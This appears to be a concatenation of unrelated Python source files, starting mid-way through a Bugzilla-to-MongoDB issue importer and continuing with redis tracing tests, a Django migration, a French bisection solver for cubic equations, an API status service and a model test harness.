processing: Store the events. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_event`
5. Process all comments. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_comments`
:param issue: issue that was got from the bugzilla REST API
"""
# Transform issue
comments = self.bugzilla_agent.get_comments(issue['id'])
histories = self.bugzilla_agent.get_issue_history(issue['id'])
mongo_issue = self._transform_issue(issue, comments)
logger.debug('Transformed issue: %s', mongo_issue)
# Go through history
# 1) Set back issue
# 2) Store events
j = 0
events_to_insert = []
for history in reversed(histories):
i = 0
change_date = dateutil.parser.parse(history['when'])
author_id = self._get_people(history['who'])
for bz_event in history['changes']:
logger.debug("Processing event: %s" % bz_event)
unique_event_id = str(issue['id'])+"%%"+str(i)+"%%"+str(j)
mongo_event, is_new_event = self._process_event(unique_event_id, bz_event, mongo_issue, change_date,
author_id)
logger.debug('Newly created?: %s, Resulting event: %s' % (is_new_event, mongo_event))
# Append to list if event is not stored in db
if is_new_event:
events_to_insert.append(mongo_event)
i += 1
j += 1
# Update issue to the original version
mongo_issue.save()
# Store events
if events_to_insert:
Event.objects.insert(events_to_insert, load_bulk=False)
# Store comments
self._process_comments(mongo_issue.id, comments)
def _process_comments(self, mongo_issue_id, comments):
"""
Processes the comments for an issue
:param mongo_issue_id: Object of class :class:`bson.objectid.ObjectId`. Identifier of the document that holds
the issue information
:param comments: comments that were received from the bugzilla API
"""
# Go through all comments of the issue
comments_to_insert = []
logger.info('Processing %d comments...' % (len(comments)-1))
i = -1
for comment in comments:
# Comment with count 0 is the description of the bug
if comment['count'] == 0:
continue
i += 1
logger.debug('Processing comment: %s' % comment)
unique_comment_id = "%s%%%s" % (mongo_issue_id, i)
try:
IssueComment.objects(external_id=unique_comment_id, issue_id=mongo_issue_id).get()
continue
except DoesNotExist:
mongo_comment = IssueComment(
external_id=unique_comment_id,
issue_id=mongo_issue_id,
created_at=dateutil.parser.parse(comment['creation_time']),
author_id=self._get_people(comment['creator']),
comment=comment['text'],
)
logger.debug('Resulting comment: %s' % mongo_comment)
comments_to_insert.append(mongo_comment)
# If comments need to be inserted -> bulk insert
if comments_to_insert:
IssueComment.objects.insert(comments_to_insert, load_bulk=False)
def _process_event(self, unique_event_id, bz_event, mongo_issue, change_date, author_id):
"""
Processes the event. During the event processing the Issue is set back to its original state
before the event occured.
:param unique_event_id: unique identifier of the event
:param bz_event: event that was received from the bugzilla API
:param mongo_issue: issue that is/should be stored in the mongodb
:param change_date: date when the event was created
:param author_id: :class:`bson.objectid.ObjectId` of the author of the event
"""
is_new_event = True
try:
mongo_event = Event.objects(external_id=unique_event_id, issue_id=mongo_issue.id).get()
is_new_event = False
except DoesNotExist:
mongo_event = Event(
external_id=unique_event_id,
issue_id=mongo_issue.id,
created_at=change_date,
author_id=author_id
)
# We need to map back the status from the bz terminology to ours. Special: The assigned_to must be mapped to
# assigned_to_detail beforehand, as we are using this for the issue parsing
if bz_event['field_name'] == 'assigned_to':
bz_at_name = 'assigned_to_detail'
else:
bz_at_name = bz_event['field_name']
try:
mongo_event.status = self.at_mapping[bz_at_name]
except KeyError:
logger.warning('Mapping for attribute %s not found.' % bz_at_name)
mongo_event.status = bz_at_name
# Check if the mongo_issue has the attribute.
# If yes: We can use the mongo_issue to set the old and new value of the event
# If no: We use the added / removed fields
if hasattr(mongo_issue, mongo_event.status):
mongo_event.new_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
self._set_back_mongo_issue(mongo_issue, mongo_event.status, bz_event)
mongo_event.old_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
else:
mongo_event.new_value = bz_event['added']
mongo_event.old_value = bz_event['removed']
return mongo_event, is_new_event
def _set_back_mongo_issue(self, mongo_issue, mongo_at_name, bz_event):
"""
Method to set back the issue stored in the mongodb
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
function_mapping = {
'title': self._set_back_string_field,
'priority': self._set_back_priority,
'status': self._set_back_string_field,
'affects_versions': self._set_back_array_field,
'components': self._set_back_array_field,
'labels': self._set_back_array_field,
'resolution': self._set_back_string_field,
'fix_versions': self._set_back_array_field,
'assignee_id': self._set_back_assignee,
'issue_links': self._set_back_issue_links,
'environment': self._set_back_string_field,
'platform': self._set_back_string_field
}
correct_function = function_mapping[mongo_at_name]
correct_function(mongo_issue, mongo_at_name, bz_event)
def _set_back_priority(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the priority of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
mongo_issue.priority = bz_event['removed']
def _set_back_issue_links(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the link to the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "removed" must be added
if bz_event['removed']:
issue_id = self._get_issue_id_by_system_id(bz_event['removed'])
if issue_id not in [entry['issue_id'] for entry in item_list]:
item_list.append({'issue_id': issue_id, 'type': type_mapping[bz_event['field_name']],
'effect': bz_event['field_name']})
# Everything that is in "added" must be removed
if bz_event['added']:
issue_id = self._get_issue_id_by_system_id(bz_event['added'])
found_index = 0
for stored_issue in item_list:
if stored_issue['issue_id'] == issue_id:
break
found_index += 1
try:
del item_list[found_index]
except IndexError:
logger.warning('Could not process event %s completely. Did not found issue to delete Issue %s' %
(bz_event, mongo_issue))
setattr(mongo_issue, mongo_at_name, item_list)
def _set_back_assignee(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the assignee of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed']:
setattr(mongo_issue, mongo_at_name, self._get_people(bz_event['removed']))
else:
setattr(mongo_issue, mongo_at_name, None)
def _set_back_string_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back normal string fields, e.g., title, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
setattr(mongo_issue, mongo_at_name, bz_event['removed'])
def _set_back_array_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back array fields, e.g., components, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "added" must be removed
if bz_event['added']:
# We try to remove the item. If it is not in there, we remove the whole list. Observations showed,
# that this is most likely the correct decision
try:
item_list.remove(bz_event['added'])
except ValueError:
item_list.clear()
# Everything that is in "removed" must be added
if bz_event['removed'] and bz_event['removed'] not in item_list:
item_list.append(bz_event['removed'])
setattr(mongo_issue, mongo_at_name, item_list)
def _parse_bz_field(self, bz_issue, at_name_bz):
"""
Parses fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
field_mapping = {
'assigned_to_detail': self._parse_author_details,
'blocks': self._parse_issue_links,
'component': self._parse_string_field,
'creation_time': self._parse_date_field,
'creator_detail': self._parse_author_details,
'depends_on': self._parse_issue_links,
'dupe_of': self._parse_issue_links,
'keywords': self._parse_array_field,
'last_change_time': self._parse_date_field,
'op_sys': self._parse_string_field,
'platform': self._parse_string_field,
'resolution': self._parse_string_field,
'severity': self._parse_string_field,
'status': self._parse_string_field,
'summary': self._parse_string_field,
'target_milestone': self._parse_string_field,
'version': self._parse_string_field,
}
correct_function = field_mapping.get(at_name_bz)
return correct_function(bz_issue, at_name_bz)
def _parse_author_details(self, bz_issue, at_name_bz):
"""
Parses author details from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
if 'email' in bz_issue[at_name_bz]:
return self._get_people(bz_issue[at_name_bz]['name'], bz_issue[at_name_bz]['email'],
bz_issue[at_name_bz]['real_name'])
else:
return self._get_people(bz_issue[at_name_bz]['name'])
def _parse_string_field(self, bz_issue, at_name_bz):
"""
Parses string fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_array_field(self, bz_issue, at_name_bz):
"""
Parses array fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_issue_links(self, bz_issue, at_name_bz):
"""
Parses the issue links from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
issue_links = []
if isinstance(bz_issue[at_name_bz], list):
for link in bz_issue[at_name_bz]:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(link),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
else:
if bz_issue[at_name_bz] is not None:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(bz_issue[at_name_bz]),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
return issue_links
def _parse_date_field(self, bz_issue, at_name_bz):
"""
Parses the date field from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return dateutil.parser.parse(bz_issue[at_name_bz])
def _transform_issue(self, bz_issue, bz_comments):
"""
Transforms the issue from an bugzilla issue to our issue model
:param bz_issue: bugzilla issue (returned by the API)
:param bz_comments: comments to the bugzilla issue (as the first comment is the description of the issue)
:return:
"""
try:
mongo_issue = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(bz_issue['id'])).get()
except DoesNotExist:
mongo_issue = Issue(
issue_system_id=self.issue_system_id,
external_id=str(bz_issue['id'])
)
# Set fields that can be directly mapped
for at_name_bz, at_name_mongo in self.at_mapping.items():
if isinstance(getattr(mongo_issue, at_name_mongo), list):
# Get the result and the current value and merge it together
result = self._parse_bz_field(bz_issue, at_name_bz)
current_value = getattr(mongo_issue, at_name_mongo, list())
if not isinstance(result, list):
result = [result]
# Extend
current_value.extend(result)
if len(current_value) > 0 and at_name_mongo == 'issue_links':
current_value = list({v['issue_id']: v for v in current_value}.values())
else:
current_value = list(set(current_value))
# Set the attribute
setattr(mongo_issue, at_name_mongo, copy.deepcopy(current_value))
else:
setattr(mongo_issue, at_name_mongo, self._parse_bz_field(bz_issue, at_name_bz))
# The first comment is the description! Bugzilla does not have a separate description field. The comment
# with the count == 0 is the description
for comment in bz_comments:
if comment['count'] == 0:
mongo_issue.desc = comment['text']
break
# Bugzilla does not have a separate field for the type. Therefore, we distinguish between bug an enhancement
# based on the severity information
if bz_issue['severity'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
return mongo_issue.save()
def _get_mongo_attribute(self, field_name):
"""
Maps the attirbutes of the bugzilla api to the attributes of the document stored in the mongodb
:param field_name: field name that should be mapped
"""
return self.at_mapping[field_name]
def _get_people(self, username, email=None, name=None):
"""
Gets people from the people collection
:param username: username of the user
:param email: email of the user
:param name: name of the user
"""
# Check if user was accessed before. This reduces the amount of API requests
if username in self.people:
return self.people[username]
# If email and name are not set, make a request to get the user
if email is None and name is None:
user = self.bugzilla_agent.get_user(username)
# If the user is not found, we must use the username name
if user is None:
email = None
name = username
else:
email = user['email']
name = user['real_name']
# Check if email is none, this can happen as an email address may be excluded from the return value
if email is None:
# Check if the username is a valid email address, if yes use this
if validate_email(username):
email = username
else:
email = "[email protected]"
# Replace the email address "anonymization"
email = email.replace(' at ', '@').replace(' dot ', '.')
people_id = People.objects(name=name, email=email).upsert_one(name=name, email=email, username=username).id
self.people[username] = people_id
return people_id
def _get_issue_id_by_system_id(self, system_id):
"""
Gets the issue by their id that was assigned by the bugzilla ITS
:param system_id: id of the issue in the bugzilla ITS
"""
try:
issue_id = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(system_id)).only('id').get().id
except DoesNotExist:
issue_id = Issue(issue_system_id=self.issue_system_id, external_id=str(system_id)).save().id
return issue_id
|
py | 1a32f79af400eaf7bf387c4b135a431db3cd5772 | from opentracing.mocktracer import MockTracer
from mock import patch
import unittest
import redis
import redis_opentracing
class TestClient(unittest.TestCase):
def setUp(self):
self.tracer = MockTracer()
self.client = redis.StrictRedis()
def test_trace_client(self):
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
self.assertEqual(res, '1')
self.assertEqual(exc_command.call_count, 1)
self.assertTrue(True, exc_command.call_args == (('my.key',),))
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'GET my.key',
'span.kind': 'client',
})
def test_trace_client_error(self):
with patch.object(self.client,
'execute_command',
side_effect=ValueError) as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
call_exc = None
try:
self.client.get('my.key')
except ValueError as exc:
call_exc = exc
self.assertEqual(exc_command.call_count, 1)
self.assertTrue(True, exc_command.call_args == (('my.key',),))
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'GET my.key',
'span.kind': 'client',
'error': True,
})
self.assertEqual(len(span.logs), 1)
self.assertEqual(span.logs[0].key_values.get('event', None),
'error')
self.assertTrue(isinstance(
span.logs[0].key_values.get('error.object', None), ValueError
))
def test_trace_client_start_span_cb(self):
def start_span_cb(span):
span.set_operation_name('Test')
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False,
start_span_cb=start_span_cb)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'Test')
def test_trace_client_start_span_cb_exc(self):
def start_span_cb(span):
raise RuntimeError('This should not happen')
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False,
start_span_cb=start_span_cb)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertFalse(span.tags.get('error', False))
def test_trace_client_pipeline(self):
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
pipe = self.client.pipeline()
pipe.rpush('my:keys', 1, 3)
pipe.rpush('my:keys', 5, 7)
pipe.execute()
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'MULTI')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'RPUSH my:keys 1 3;RPUSH my:keys 5 7',
'span.kind': 'client',
})
def test_trace_client_pubsub(self):
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
pubsub = self.client.pubsub()
pubsub.subscribe('test')
# Subscribing can cause more than a SUBSCRIBE call.
self.assertTrue(len(self.tracer.finished_spans()) >= 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'SUBSCRIBE')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'SUBSCRIBE test',
'span.kind': 'client',
})
|
py | 1a32f90518c76d363f7512aaf81fec08649edbb0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-20 21:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gated_launch_auth', '0006_auto_20170726_1537'),
]
operations = [
migrations.AddField(
model_name='user',
name='weixin_openid',
field=models.CharField(blank=True, db_index=True, max_length=60, null=True),
),
]
|
py | 1a32fbc0df687a1cdf09f1b58a2613a4db34bad0 | # commentaire
# resolution approchée d'une equation du troisième degre
# version 2
import math
# Fonction calcul de delta
def calculerDelta(a, b, c):
return b**2-4*a*c
# Fonction Résolution Equation Second Degre
def resoudreEquationSecondDegre(a, b, c):
delta = calculerDelta(a, b, c)
if delta > 0:
racineDeDelta = math.sqrt(delta)
retour = [(-b-racineDeDelta)/(2*a), (-b+racineDeDelta)/(2*a)]
elif delta < 0:
retour = [] # liste vide
else:
retour = [-b/(2*a)] # liste d'un seul élément
return retour
# Fonction qui calcule la faleur de f(x)=a^3 + bx^2 + cx + d
def calculerFxPolynome3dg(x, a, b, c, d):
return a*x**3 + b*x**2 + c*x + d
# Fonction qui permet de comparer le signe de deux nombre. true = de même signe, false = de signe opposé
def compareSign(x, y):
if(x > 0 and y > 0) or (x < 0 and y < 0):
return True
else:
return False
# Fonction qui itére 100 fois entre deux valeurs x1 et x2 avec f(x1) et f(x2) de signe opposé et retournant la valeur x approchant de f(x)=0
def trouverFxEgal0(p1, p2, a, b, c, d):
for i in range(0, 100):
# Pour cela, prenons un point p0 milieu p1 et p2 et regardons si il est positif ou négatif
p0 = (p1+p2)/2
# calculons f(p0), f(p1) et f(p2)
fp0 = calculerFxPolynome3dg(p0, a, b, c, d)
fp1 = calculerFxPolynome3dg(p1, a, b, c, d)
fp2 = calculerFxPolynome3dg(p2, a, b, c, d)
# print("itération ", i, " : fp0 = ", fp0," fp1 = ", fp1, " fp2 = ", fp2)
if compareSign(fp0, fp1):
p1 = p0
p2 = p2
else:
p1 = p1
p2 = p0
return p0
# saisie des paramètres de la fonction f à l'aide de la fonction input
# input donnant une variable de type string, la fonction float la transforme en
# type décimale
print("Saisir les paramètres a,b,c,d de votre polynome du troisième degré a^3 + bx^2 + cx + d:")
a = float(input("Saisir la valeur de a="))
b = float(input("Saisir la valeur de b="))
c = float(input("Saisir la valeur de c="))
d = float(input("Saisir la valeur de d="))
# Calcul des paramètres de la fonction dérivée f'
A = 3*a
B = 2*b
C = c
print("La dérivée f' de la fonction f est ", A, "x^2 + ", B, "x + ", C)
# Calcul et affichage de l'équation du second degré f'
print("Résolution de l'équation f' ", A, "x^2 + ", B, "x + ", C)
delta = calculerDelta(A, B, C)
result = resoudreEquationSecondDegre(A, B, C)
# Condition sur delta de f' dans cet ordre >0 puis ==0 puis <0
if delta > 0:
# Ordonnons les résultats x1 et x2, solution de l'équation f'(x)=0
if result[0] > result[1]:
x1 = result[1]
x2 = result[0]
else:
x1 = result[0]
x2 = result[1]
print("Delta de f' est positif donc il y a 2 solutions")
print("x1 =", x1)
print("x2 =", x2)
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print("Delta de f' est positif ainsi que A donc les variations de f(x) sont les suivantes :")
print("pour x < ", x1, " f(x) est croissante")
print("pour ", x1, " < x < ", x2, " f(x) est decroissante")
print("pour x > ", x2, " f(x) est croissante")
else: # A est négatif
print("Delta de f' est positif et A est négatif donc les variations de f(x) sont les suivantes :")
print("pour x < ", result[0], " f(x) est décroissante")
print("pour ", result[0], " < x < ", result[1], " f(x) est croissante")
print("pour x > ", result[1], " f(x) est décroissante")
# Calculons f(x1) et f(x2), extremums de f pour Delta > 0 et A positif ou négatif
print("Calculons f(x1) et f(x2), extremum de f")
f1 = calculerFxPolynome3dg(x1, a, b, c, d)
f2 = calculerFxPolynome3dg(x2, a, b, c, d)
print("f1 =", f1)
print("f2 =", f2)
if (f1 < 0 and f2 > 0) or (f1 > 0 and f2 < 0):
print("Cas ou f1 et f2 sont de signes oposés. Il y a donc une solution f(x) = 0 pour x compris entre x1 et x2")
# Approchons la solution f(x) = 0 pour x compris entre x1 et x2
# ---------------------------------------------------------------
# Faisons une boucle qui calcul f(x) pour x compris entre x1 et x2
p1 = x1
p2 = x2
p0 = trouverFxEgal0(p1, p2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x compris entre x1 et x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # les extremums sont de mêmes signes
print("Cas ou f1 et f2 sont de même signes. Il n'y a donc pas de solution f(x) = 0 pour x compris entre x1 et x2")
if compareSign(f1, A):
print(
"f1 et A sont de même signe. Donc, il existe une solution x telle que f(x)=0 pour x < x1")
# Approchons la solution f(x) = 0 pour x < x1
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
print(
"f1 et A sont de signe opposé. Donc, il existe une solution x telle que f(x)=0 pour x > x2")
# Approchons la solution f(x) = 0 pour x > x2
# ----------------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = x2 + 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x2, a, b, c, d)):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et f(x2) soient de signe opposé avec x > x2 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x2) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else: # Delta est null ou négatif
if delta == 0:
print("Delta de f' est nul donc il y a 1 solution unique")
print("x0 =", result[0])
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print("Delta de f' est null et A est postif donc f est toujours croissante")
else: # A est négatif
print(
"Delta de f' est null et A est négatif donc f est toujours décroissante")
else:
print("Pas de solution dans l'espace des réel pour f'(x)=0")
# Déterminons les variations de f selon la valeur de Delta et le signe de A
if A > 0:
print(
"Delta de f' est négatif et A est postif donc f est toujours croissante")
else: # A est négatif
print(
"Delta de f' est négatif et A est négatif donc f est toujours décroissante")
# Trouvons une valeur de x tel que f(0) et f(x) soit de signe opposé.
# Pour cela, comparons le signe de A et de d pour détermine si x pour f(x)=0 est positif ou négatif
if compareSign(A, d):
# Approchons la solution f(x) = 0 pour x < 0
# ----------------------------------------------------
# trouvons un point x0 inférieur à x1 de sorte que f(x0) soit de signe opposé à f(x1)
x0 = - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x < 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
else:
# Approchons la solution f(x) = 0 pour x > 0
# ------------------------------------------
# trouvons un point x0 supérieur à x2 de sorte que f(x0) soit de signe opposé à f(x2)
x0 = 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), d):
x0 = x0 + 1
print(
"Valeur de x0 de sorte que f(x0) et d soient de signe opposé avec x > 0 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
p0 = trouverFxEgal0(x0, 0, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x > 0 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
|
py | 1a32fc55aaf6cb394143e3536fb969c774cc620b | # coding=utf-8
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import Any, Dict, Optional
import psutil
from fastapi import Depends
from hurry.filesize import size
from rubrix import __version__ as rubrix_version
from ..commons.es_wrapper import ElasticsearchWrapper
from .model import ApiStatus
class ApiInfoService:
"""
The api info service
"""
def __init__(self, es: ElasticsearchWrapper):
self.__es__ = es
def api_status(self) -> ApiStatus:
"""Returns the current api status"""
return ApiStatus(
rubrix_version=str(rubrix_version),
elasticsearch=self._elasticsearch_info(),
mem_info=self._api_memory_info(),
)
def _elasticsearch_info(self) -> Dict[str, Any]:
"""Returns the elasticsearch cluster info"""
return self.__es__.get_cluster_info()
@staticmethod
def _api_memory_info() -> Dict[str, Any]:
"""Fetch the api process memory usage"""
process = psutil.Process(os.getpid())
return {k: size(v) for k, v in process.memory_info()._asdict().items()}
_instance: Optional[ApiInfoService] = None
def create_info_service(
es_wrapper: ElasticsearchWrapper = Depends(ElasticsearchWrapper.get_instance),
) -> ApiInfoService:
"""
Creates an api info service
"""
global _instance
if not _instance:
_instance = ApiInfoService(es_wrapper)
return _instance
|
py | 1a32fc92ddf91e29367bf9c2e1d143b6edcd87b2 | import torch
import os
import configs
import datasets
import models
class BaseTest(object):
def __init__(self, model):
self.model = model
def run(self):
for model_cfg in models.allcfgs():
if hasattr(model_cfg, 'name') and model_cfg.name == self.model.__name__:
model_name = os.path.splitext(os.path.split(model_cfg._path)[1])[0]
print('Testing model: ' + model_name + ' ...')
for data_cfg in datasets.allcfgs():
if not self.model.check_cfg(data_cfg, model_cfg):
continue
data_name = os.path.splitext(os.path.split(data_cfg._path)[1])[0]
print('\tTesting dataset: ' + data_name + ' ...')
data_cfg.index_cross = 1
sample_dict = dict()
for name, value in vars(data_cfg).items():
if name.startswith('source') or name.startswith('target'):
kernel = getattr(data_cfg, 'kernel' if name.startswith('source') else 'out_kernel', None)
if kernel is not None:
sample_shape = (kernel.kT, kernel.kW, kernel.kH)
sample_dict[name] = torch.randn(configs.env.ci.batchsize, *sample_shape)
else:
sample_shape = (value.time, value.width, value.height) \
if hasattr(value, 'time') else [value.elements]
sample_dict[name] = torch.randint(value.classes, (configs.env.ci.batchsize, 1)).long() \
if len(sample_shape) == 1 and sample_shape[0] == 1 \
else torch.randn(configs.env.ci.batchsize, *sample_shape)
print("\t-- " + name + " size: ", end="")
print(sample_dict[name].size())
for run_cfg in configs.Run.all():
run_name = os.path.splitext(os.path.split(run_cfg._path)[1])[0]
print('\t\tTesting config: ' + run_name + ' ...')
model = self.model(model_cfg, data_cfg, run_cfg)
params, params_all = dict(), 0
for name, value in model.modules().items():
params[name] = sum(p.numel() for p in value.parameters() if p.requires_grad)
params_all += params[name]
print("\t\t-- parameter(s): ", end="")
print(params)
print("\t\t-- all parameters: ", end="")
print(params_all)
loss_dict = model.train(0, sample_dict)
print("\t\t-- loss(es): ", end="")
print(loss_dict)
result_dict = model.test(0, sample_dict)
for name, value in result_dict.items():
result_dict[name] = value.shape
print("\t\t-- result(s) size: ", end="")
print(result_dict)
print("\t\t-- save folder: ", end="")
print(model.getpath())
